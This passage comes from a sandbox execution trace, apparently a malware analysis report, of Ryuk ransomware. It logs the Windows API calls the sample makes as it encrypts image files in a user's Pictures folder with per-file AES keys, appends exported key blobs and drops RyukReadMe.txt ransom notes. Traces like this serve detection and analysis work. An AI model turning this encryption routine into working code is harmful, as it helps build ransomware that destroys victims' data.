HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\Ykuz0hkVXlw7uAd6 VsN.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\hbk74mjqdk\\ykuz0hkvxlw7uad6 vsn.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.178] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=53126) returned 1 [0158.178] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=53126) returned 1 [0158.178] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xce64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.178] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.179] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.179] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.179] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.179] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.179] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xcf86, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xcf86, lpOverlapped=0x0) returned 1 [0158.180] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.180] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xcf86, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xcf90) returned 1 [0158.180] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.180] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcf90, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xcf90, lpOverlapped=0x0) returned 1 [0158.180] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.180] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.180] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.180] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.180] CloseHandle (hObject=0x190) returned 1 [0158.196] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.200] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.200] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.200] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0158.200] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0158.200] SetLastError (dwErrCode=0x0) [0158.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hBK74mjqdk\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\hbk74mjqdk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.201] GetLastError () returned 0x0 [0158.201] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0158.202] CloseHandle (hObject=0x18c) returned 1 [0158.202] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.202] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.202] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hmNKk5CHRtJ4aO3hZ.gif", dwFileAttributes=0x80) returned 1 [0158.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\hmNKk5CHRtJ4aO3hZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\hmnkk5chrtj4ao3hz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.202] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=22183) returned 1 [0158.202] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=22183) returned 1 [0158.202] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x5585, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.202] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.203] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.203] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.203] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.203] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.203] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x56a7, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x56a7, lpOverlapped=0x0) returned 1 [0158.204] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.204] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x56a7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x56b0) returned 1 [0158.204] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.204] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x56b0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x56b0, lpOverlapped=0x0) returned 1 [0158.204] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.204] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.204] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.204] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.204] CloseHandle (hObject=0x18c) returned 1 [0158.220] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.224] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.224] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.224] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\QDHVQ94b_viDj-yT0.bmp", dwFileAttributes=0x80) returned 1 [0158.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\QDHVQ94b_viDj-yT0.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\qdhvq94b_vidj-yt0.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.225] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=20372) returned 1 [0158.225] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=20372) returned 1 [0158.225] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x4e72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.225] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.226] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.226] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.226] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.226] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.226] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4f94, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x4f94, lpOverlapped=0x0) returned 1 [0158.227] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.227] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x4f94, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x4fa0) returned 1 [0158.227] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.227] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x4fa0, lpOverlapped=0x0) returned 1 [0158.227] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.227] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.227] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.227] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.227] CloseHandle (hObject=0x18c) returned 1 [0158.245] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.250] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.250] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.250] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.250] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.250] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\qf6desic6Fn6l.jpg", dwFileAttributes=0x80) returned 1 [0158.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\qf6desic6Fn6l.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\qf6desic6fn6l.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.250] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=53269) returned 1 [0158.250] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=53269) returned 1 [0158.251] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xcef3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.251] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.251] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.251] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.251] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.251] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.252] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd015, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xd015, lpOverlapped=0x0) returned 1 [0158.253] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.253] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xd015, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xd020) returned 1 [0158.253] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.253] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd020, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xd020, lpOverlapped=0x0) returned 1 [0158.253] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.253] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.253] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.253] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.253] CloseHandle (hObject=0x18c) returned 1 [0158.272] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.277] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.277] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.277] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.277] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\tj5S.bmp", dwFileAttributes=0x80) returned 1 [0158.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\tj5S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\tj5s.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.278] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=41579) returned 1 [0158.278] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=41579) returned 1 [0158.278] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xa149, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.278] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.279] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.279] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.279] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.279] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.279] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa26b, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xa26b, lpOverlapped=0x0) returned 1 [0158.280] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.280] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xa26b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xa270) returned 1 [0158.281] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.281] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa270, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xa270, lpOverlapped=0x0) returned 1 [0158.281] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.281] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.281] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.281] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.281] CloseHandle (hObject=0x18c) returned 1 [0158.307] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.311] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.311] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.311] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.311] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.312] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\U_e62uhsznG2L0eIH2.jpg", dwFileAttributes=0x80) returned 1 [0158.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Olcu7KS_Bf1M\\U_e62uhsznG2L0eIH2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\olcu7ks_bf1m\\u_e62uhszng2l0eih2.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.312] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=66364) returned 1 [0158.312] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=66364) returned 1 [0158.312] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1021a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.312] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.313] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.313] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.313] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.313] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.313] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1033c, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1033c, lpOverlapped=0x0) returned 1 [0158.314] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.314] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1033c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10340) returned 1 [0158.315] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.315] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, 